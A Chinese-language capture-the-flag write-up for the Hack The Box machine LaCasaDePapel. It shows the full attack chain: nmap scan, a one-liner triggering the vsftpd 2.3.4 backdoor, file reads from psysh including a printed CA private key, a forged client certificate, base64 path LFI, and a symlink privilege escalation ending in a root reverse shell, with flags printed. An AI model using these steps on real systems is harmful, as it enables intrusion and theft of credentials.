简介
靶机状态: rooted.
文章目录
- nmap&&vsftpd&&backdoor
- Client Authentication Certificate
- Symblink
nmap&&vsftpd&&backdoor
nmap扫描端口,发现vsftpd、OpenSSH、Nodejs;起初一位是vsftpd后门+nodejs deserialize RCE 实现getshell;结果大相径庭。
nmap
info:
- vsftpd 2.3.4 backdoor
- OpenSSH 7.9
- Node.js(80, 443)
- SSL(ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30# Nmap 7.70 scan initiated Sun Jun 23 17:41:20 2019 as: nmap -sC -sV -oA LaCasaDePapel 10.10.10.131
Nmap scan report for 10.10.10.131
Host is up (0.48s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
| 256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_ 256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp open http Node.js (Express middleware)
|_http-title: La Casa De Papel
443/tcp open ssl/http Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after: 2029-01-24T08:35:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
| http/1.1
|_ http/1.0
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 23 17:44:43 2019 -- 1 IP address (1 host up) scanned in 203.65 seconds
ftp backdoor
1 | $ ftp 10.10.10.131 |
psysh简介:
psy利用:
通过help列命令,查看命令的功能和用法;结合ls查看当前的变量和环境信息;然后借助PHP function读取文件内容获取服务器端https证书私钥。1
2
3
4
5
6
7
8
9ls -la
Variables:
$tokyo Tokyo {#2307}
$_ null
$_e Symfony\Component\Console\Exception\RuntimeException {#2316 …3}
$__class "Tokyo"
$__file "/home/dali/.config/psysh/tokyo.php"
$__line 2
$__dir "/home/dali/.config/psysh"
通过php函数file_get_contents读取文件内容(”echo file_get_contents(“/etc/passwd”);”),之后发现require函数可用;通过用require包含本地文件require("/etc/passwd")
,读取用户信息: root、operator、postgres、dali、berlin、professor;1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35require("/etc/passwd")
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
chrony:x:100:101:chrony:/var/log/chrony:/sbin/nologin
dali:x:1000:1000:dali,,,:/home/dali:/usr/bin/psysh
berlin:x:1001:1001:berlin,,,:/home/berlin:/bin/ash
professor:x:1002:1002:professor,,,:/home/professor:/bin/ash
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin
memcached:x:102:102:memcached:/home/memcached:/sbin/nologin
通过require读取/etc/shadow文件和读取/etc/owef文件做测试发现, 如果reqiire的返回结果是没有权限, 说明文件存在但是当前用户没有查看权限; 如果返回Fail opening, 说明文件不存在; 如下:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17# 读取存在的文件
require("/home/berlin/user.txt")
PHP Warning: Uncaught Psy\Exception\ErrorException: PHP Warning: require(/home/berlin/user.txt): failed to open stream: Permission denied in phar:///usr/bin/psysh/src/ExecutionLoopClosure.php(55) : eval()'d code on line 1 in phar:///usr/bin/psysh/src/ExecutionLoopClosure.php(55) : eval()'d code:1
Stack trace:
#0 phar:///usr/bin/psysh/src/Shell.php(1130): Psy\Exception\ErrorException::throwException(2, 'require(/home/b...', 'phar:///usr/bin...', 1)
#1 phar:///usr/bin/psysh/src/ExecutionLoopClosure.php(55) : eval()'d code(1): Psy\Shell->handleError(2, 'require(/home/b...', 'phar:///usr/bin...', 1, Array)
#2 phar:///usr/bin/psysh/src/ExecutionLoopClosure.php(55) : eval()'d code(1): require()
#3 phar:///usr/bin/psysh/src/ExecutionLoopClosure.php(55): eval()
#4 phar:///usr/bin/psysh/src/ExecutionClosure.php(101): Psy\{closure}()
#5 phar:///usr/bin/psysh/src/ExecutionLoop.php(33): Psy\ExecutionClosure->execute()
#6 phar:///usr/bin/psysh/src/Shell.php(351): Psy\ExecutionLoop->run(Object(Psy\Shell))
#7 phar:///usr/bin/psysh/vend in phar:///usr/bin/psysh/src/ExecutionLoopClosure.php(55) : eval()'d code on line 1
PHP Fatal error: Unknown: Failed opening required '/home/berlin/user.txt' (include_path='.:/usr/share/php7') in phar:///usr/bin/psysh/src/ExecutionLoopClosure.php(55) : eval()'d code on line 1
# 读取不存在的文件
require("/home/berlin/a.txt")
PHP Fatal error: Failed opening required '/home/berlin/a.txt' in Psy Shell code on line 1
于是, 在berlin用户的home目录中找到user.txt, 尝试逃逸psy shell然后提权至其他berlin用户读取user.txt结果失败;
Client Authentication Certificate
访问https时,页面返回证书错误的信息,结合上一步中找到的psy读取文件,从nairobi的home目录中读取到ca.key,利用服务器端私钥创建客户端证书访问https,利用https的LFI读取nairobi用户的ssh key;利用nairobi的ssh登陆professor用户。
read ca.key
由于上一步信息收集不到位,因此这里又重新收集了一遍信息,通过ls -la
查看当前环境信息和变量信息之后,利用file_get_contents函数读取“/home/dali/.config/psysh/tokyo.php”文件内容,从文件中获取到创建客户端证书的代码和服务器端key:
php file_get_contents()函数读取”/home/dali/.config/psysh/tokyo.php”文件内容,如下:1
2
3
4
5
6
7
8
9
10
11
class Tokyo {
private function sign($caCert,$userCsr) {
$caKey = file_get_contents('/home/nairobi/ca.key');
$userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
openssl_x509_export($userCert, $userCertOut);
return $userCertOut;
}
}
$tokyo = new Tokyo;
分析Tokyo类可知,该类用于通过服务器端证书文件和证书公钥创建客户端证书的;于是,先利用file_get_contents函数读取ca.key文件的内容:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDPczpU3s4Pmwdb
7MJsi//m8mm5rEkXcDmratVAk2pTWwWxudo/FFsWAC1zyFV4w2KLacIU7w8Yaz0/
2m+jLx7wNH2SwFBjJeo5lnz+ux3HB+NhWC/5rdRsk07h71J3dvwYv7hcjPNKLcRl
uXt2Ww6GXj4oHhwziE2ETkHgrxQp7jB8pL96SDIJFNEQ1Wqp3eLNnPPbfbLLMW8M
YQ4UlXOaGUdXKmqx9L2spRURI8dzNoRCV3eS6lWu3+YGrC4p732yW5DM5Go7XEyp
s2BvnlkPrq9AFKQ3Y/AF6JE8FE1d+daVrcaRpu6Sm73FH2j6Xu63Xc9d1D989+Us
PCe7nAxnAgMBAAECggEAagfyQ5jR58YMX97GjSaNeKRkh4NYpIM25renIed3C/3V
Dj75Hw6vc7JJiQlXLm9nOeynR33c0FVXrABg2R5niMy7djuXmuWxLxgM8UIAeU89
1+50LwC7N3efdPmWw/rr5VZwy9U7MKnt3TSNtzPZW7JlwKmLLoe3Xy2EnGvAOaFZ
/CAhn5+pxKVw5c2e1Syj9K23/BW6l3rQHBixq9Ir4/QCoDGEbZL17InuVyUQcrb+
q0rLBKoXObe5esfBjQGHOdHnKPlLYyZCREQ8hclLMWlzgDLvA/8pxHMxkOW8k3Mr
uaug9prjnu6nJ3v1ul42NqLgARMMmHejUPry/d4oYQKBgQDzB/gDfr1R5a2phBVd
I0wlpDHVpi+K1JMZkayRVHh+sCg2NAIQgapvdrdxfNOmhP9+k3ue3BhfUweIL9Og
7MrBhZIRJJMT4yx/2lIeiA1+oEwNdYlJKtlGOFE+T1npgCCGD4hpB+nXTu9Xw2bE
G3uK1h6Vm12IyrRMgl/OAAZwEQKBgQDahTByV3DpOwBWC3Vfk6wqZKxLrMBxtDmn
sqBjrd8pbpXRqj6zqIydjwSJaTLeY6Fq9XysI8U9C6U6sAkd+0PG6uhxdW4++mDH
CTbdwePMFbQb7aKiDFGTZ+xuL0qvHuFx3o0pH8jT91C75E30FRjGquxv+75hMi6Y
sm7+mvMs9wKBgQCLJ3Pt5GLYgs818cgdxTkzkFlsgLRWJLN5f3y01g4MVCciKhNI
ikYhfnM5CwVRInP8cMvmwRU/d5Ynd2MQkKTju+xP3oZMa9Yt+r7sdnBrobMKPdN2
zo8L8vEp4VuVJGT6/efYY8yUGMFYmiy8exP5AfMPLJ+Y1J/58uiSVldZUQKBgBM/
ukXIOBUDcoMh3UP/ESJm3dqIrCcX9iA0lvZQ4aCXsjDW61EOHtzeNUsZbjay1gxC
9amAOSaoePSTfyoZ8R17oeAktQJtMcs2n5OnObbHjqcLJtFZfnIarHQETHLiqH9M
WGjv+NPbLExwzwEaPqV5dvxiU6HiNsKSrT5WTed/AoGBAJ11zeAXtmZeuQ95eFbM
7b75PUQYxXRrVNluzvwdHmZEnQsKucXJ6uZG9skiqDlslhYmdaOOmQajW3yS4TsR
aRklful5+Z60JV/5t2Wt9gyHYZ6SYMzApUanVXaWCCNVoeq+yvzId0st2DRl83Vc
53udBEzjt3WPqYGkkDknVhjD
-----END PRIVATE KEY-----
创建客户端证书访问https1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23# python触发vsftp 2.3.4 backdoor
$ python -c "from ftplib import FTP;ftp = FTP(host='10.10.10.131', user='owef:)', passwd='123');ftp.login()"
# openssl创建客户端证书
$ openssl req -newkey rsa:2048 -keyout owef_key.pem -out owef_csr.pem -nodes -days 365 -subj "/CN=Owefsad"
# 在psysh中用服务器端证书创建客户端证书
$caKey = file_get_contents('/home/nairobi/ca.key');
$caCert = file_get_contents("http://10.10.15.45/lacasadepapel.htb.crt");
$userCsr = file_get_contents("http://10.10.15.45/owef_csr.pem");
$userCert = openssl_csr_sign($userCsr, $caCert, $caKey, 365, ['digest_alg'=>'sha256']);
$openssl_x509_export($userCert, $userCrt);
# 将$userCrt内容保存至owef_cert.pem
$ echo $userCrt
# 利用owef的私钥和服务器端签名的cert导出p12格式的证书
$ openssl pkcs12 -export -clcerts -in owef_cert.pem -inkey owef_key.pem -out owef.p12
# 创建owef.p12后, 通过curl访问
$ curl --insecure --cert owef.p12 --cert-type p12 https://lacasadepapel.htb
`
访问https之后, 找到LFI漏洞,利用LFI漏洞读取berlin目录下的ssh私钥1
2
3
4
5$ curl --insecure --cert owef.p12 --cert-type p12 https://lacasadepapel.htb/\?path\=SEASON-1
$ python -c "print 'U0VBU09OLTEvMDIuYXZp'.decode('base64')" => SEASON-1/02.avi
$ python -c "print '../user.txt'.encode('base64')" => Li4vdXNlci50eHQ=
$ curl --insecure --cert owef.p12 --cert-type p12 https://lacasadepapel.htb/file/Li4vdXNlci50eHQ= => 4dcbd172fc9c9ef2ff65c13448d9062d
# user.txt = 4dcbd172fc9c9ef2ff65c13448d9062d
利用berlin用户的id_rsa作为ssh私钥文件登陆professor用户ssh -i id_rsa professor@10.10.10.131
进入professor用户下,接下来尝试获取root权限。
Symblink
每次遇到提权都不得不提一位大牛说的话”it’s easy if you know”
进入ssh后,先后尝试LinEnum.sh收集信息、pspy64查看ssh用户登陆、退出时执行的命令及计划任务执行的命令,始终无法找到突破口,最后无意中发现可以在professor的home目录中创建memcached.js的软连接;然后又创建memcached.ini文件的软连接,获取root reverse shell1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43$ nc -lv 4444
bash: cannot set terminal process group (3558): Not a tty
bash: no job control in this shell
bash-4.4# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
bash-4.4# echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/root.txt 2>/dev/null; echo " "
"proof:";cat /root/root.txt 2>/dev/null; echo " "sbin/ifconfig -a;echo " ";echo
uname -a:
Linux lacasadepapel 4.14.78-0-virt #1-Alpine SMP Tue Oct 23 11:43:38 UTC 2018 x86_64 Linux
hostname:
lacasadepapel
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
ifconfig:
eth0 Link encap:Ethernet HWaddr 00:50:56:BD:40:9D
inet addr:10.10.10.131 Bcast:0.0.0.0 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:febd:409d/64 Scope:Global
inet6 addr: fe80::250:56ff:febd:409d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:9550 errors:0 dropped:0 overruns:0 frame:0
TX packets:9368 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:972699 (949.9 KiB) TX bytes:1548975 (1.4 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:358 errors:0 dropped:0 overruns:0 frame:0
TX packets:358 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:223180 (217.9 KiB) TX bytes:223180 (217.9 KiB)
proof:
586979c48efbef5909a23750cc07f511
bash-4.4#